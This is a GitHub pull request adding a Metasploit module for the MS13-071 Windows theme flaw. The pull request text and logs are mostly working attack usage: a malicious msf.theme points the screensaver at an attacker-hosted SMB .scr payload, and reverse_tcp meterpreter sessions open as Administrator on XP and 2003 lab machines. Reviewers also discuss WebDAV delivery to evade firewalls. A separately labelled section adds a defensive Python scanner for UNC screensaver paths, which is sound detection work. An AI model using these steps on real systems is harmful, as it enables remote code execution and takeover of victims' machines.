Add module for MS13-071 #2391

Merged
merged 3 commits into from Sep 20, 2013
Conversation

jvazquez-r7
Contributor

Yup, exploit for MS13-071. In order to trigger it, the user should open the malicious msf.theme file and check the Screen Saver tab.

It has been tested on XP SP3 and 2003 SP2 successfully. (Bug related to XP and 2003).

The vulnerability is basically due to the handling of the screensaver: an arbitrary path can be used, including remote SMB paths. Since a screensaver is just an exe, game over.

The most interesting thing about the module is that it includes the SMBServer mixin and implements the routines to provide the screensaver file! It's the first step towards a mixin which provides an (anonymous) SMB share and configures the files to provide. So in the future the SMB code should be moved to a mixin, but atm, since it's early code, I feel more comfortable with just adding some code to the module, so people can test, file bugs if it isn't working in any environment, etc. Also, I get a first code review :) So yup, just explaining why it's not in a mixin atm.

The module has two modes:

  • An external SMB server is provided, and the UNCPATH option is used to point to the malicious SMB server and resource (the resource is just the payload embedded into an exe):
msf exploit(ms13_071_theme) > set UNCPATH \\\\192.168.172.243\\exploit\\exploit.scr
UNCPATH => \\192.168.172.243\exploit\exploit.scr
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Remember to share the malicious EXE payload as \\192.168.172.243\exploit\exploit.scr
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1668) at 2013-09-18 13:57:25 -0500

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.203 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > exit -y

  • Let the module also act as SMB server.
  • Tested with Windows XP SP3 and Windows 2003 SP2 / No domain / workgroup:
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\wYNNp\OrvjEg.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50887) at 2013-09-18 11:23:55 -0500
[*] Sending stage (752128 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50888) at 2013-09-18 11:24:08 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
gmeterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms13_071_theme) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 
  • Tested with WIN2003SP2 as Domain Controller, Windows XPSP3 joined the domain, then WINXPSP3 with no DOMAIN
msf exploit(ms13_071_theme) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/juan/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.172.1\JalVNbsrN\sCOmK.scr
[*] Server started.
msf exploit(ms13_071_theme) > [*] Sending stage (752128 bytes) to 192.168.172.203
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.203:1637) at 2013-09-18 13:31:27 -0500

msf exploit(ms13_071_theme) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.203 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 
[*] Sending stage (752128 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1078) at 2013-09-18 13:36:40 -0500

msf exploit(ms13_071_theme) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: SMALLBUSINESS\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 
[*] Sending stage (752128 bytes) to 192.168.172.244
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.244:1089) at 2013-09-18 13:37:59 -0500

msf exploit(ms13_071_theme) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(ms13_071_theme) > 
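
The description above says the whole bug is that the screensaver entry in a .theme file is taken as an arbitrary path, UNC paths included. The following defensive scanner is an added example and is not part of the module or of Metasploit: it parses the INI-style theme text, assuming the standard .theme layout in which the [boot] section's SCRNSAVE.EXE key names the screensaver, and flags a screensaver reference that is a UNC path, a URL, a non-.scr target, or anything outside %SystemRoot%. The two embedded theme texts are constructed samples, not files from the page.

```python
"""Scan Windows .theme files for screensaver paths that point off-box.

Added example (not the module's code). The [boot] / SCRNSAVE.EXE layout is
the standard .theme convention and is assumed here; the sample theme texts
below are constructed for the demonstration.
"""
import configparser
import re

# Constructed sample: a normal theme pointing at a built-in screensaver.
BENIGN_THEME = """[Theme]
DisplayName=Sample

[boot]
SCRNSAVE.EXE=%SystemRoot%\\system32\\ssstars.scr
"""

# Constructed sample: screensaver pulled from a remote SMB share (documentation IP).
SUSPICIOUS_THEME = """[Theme]
DisplayName=msf

[boot]
SCRNSAVE.EXE=\\\\192.0.2.10\\share\\exploit.scr
"""

# Matches \\host\share... (two leading backslashes, a host, a separator).
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def screensaver_path(theme_text):
    """Return the SCRNSAVE.EXE value from the [boot] section, or None if absent."""
    # interpolation=None so %SystemRoot% is not treated as a format marker;
    # strict=False tolerates duplicate keys, which real theme files contain.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key case as written in the file
    parser.read_string(theme_text)
    if not parser.has_section("boot"):
        return None
    for key, value in parser.items("boot"):
        if key.lower() == "scrnsave.exe":
            return value.strip()
    return None


def classify(path):
    """Return a list of finding tags for a screensaver path; empty means it looks normal."""
    findings = []
    if path is None:
        return findings
    p = path.strip('"')
    lower = p.lower()
    if UNC_RE.match(p):
        findings.append("unc_path")          # remote SMB share, the MS13-071 case
    if lower.startswith(("http:", "https:")):
        findings.append("url_path")          # WebDAV-style reference
    if not lower.endswith(".scr"):
        findings.append("non_scr_extension")
    if not lower.startswith(("%systemroot%", "c:\\windows")):
        findings.append("outside_systemroot")
    return findings


def scan(theme_text):
    """Parse a theme text and return the findings for its screensaver entry."""
    return classify(screensaver_path(theme_text))


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        print(name, screensaver_path(text), scan(text))
```

A theme dropped in a user's profile or mailbox that resolves to a UNC or URL screensaver is a strong signal on its own; on the network side, the same event shows up as an SMB (or WebDAV) fetch of a .scr from a host that is not a file server.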

@Meatballs1
Contributor

The SMB Mixin would be a good addition, but... wouldn't this be more of a true 'remote' exploit if it used WEBDAV (port 80) which is more likely to escape a firewall? Windows firewall by default restricts SMB traffic to local subnet.

In fact it would be awesome to have an SMB/WebDAV mixin with an optional, or fallback technique, as Windows by default tries \share to 445, then attempts 80 if it can't connect to that.

@jvazquez-r7
Contributor Author

WebDAV code is already in a lot of modules, but not in a mixin. The thing with WebDAV is that it requires WebClient enabled, which is true by default on XP SP3, but not on 2003 SP2 or newer versions of Windows.

@Meatballs1
Contributor

Which is why a WebDAV+SMB Mixin would be so nifty :)

@wchen-r7
Contributor

I agree with @Meatballs1, also agree with @jvazquez-r7 that this feature should be implemented in SMBServer mixin in the future. We are behind on SMB support for sure.

@wchen-r7
Contributor

Works for me:

msf > use exploit/windows/fileformat/ms13_071_theme 
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /Users/wchen/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\10.0.1.76\GufEfjOiL\qXFObOEP.scr
[*] Server started.
msf exploit(ms13_071_theme) > use exploit/multi/handler 
msf exploit(handler) > run

[-] Handler failed to bind to 10.0.1.76:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.0.1.89
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.89:3102) at 2013-09-19 22:20:02 -0500

@wchen-r7 wchen-r7 merged commit 9b486e1 into rapid7:master Sep 20, 2013
@jvazquez-r7 jvazquez-r7 deleted the windows_theme branch November 18, 2014 15:58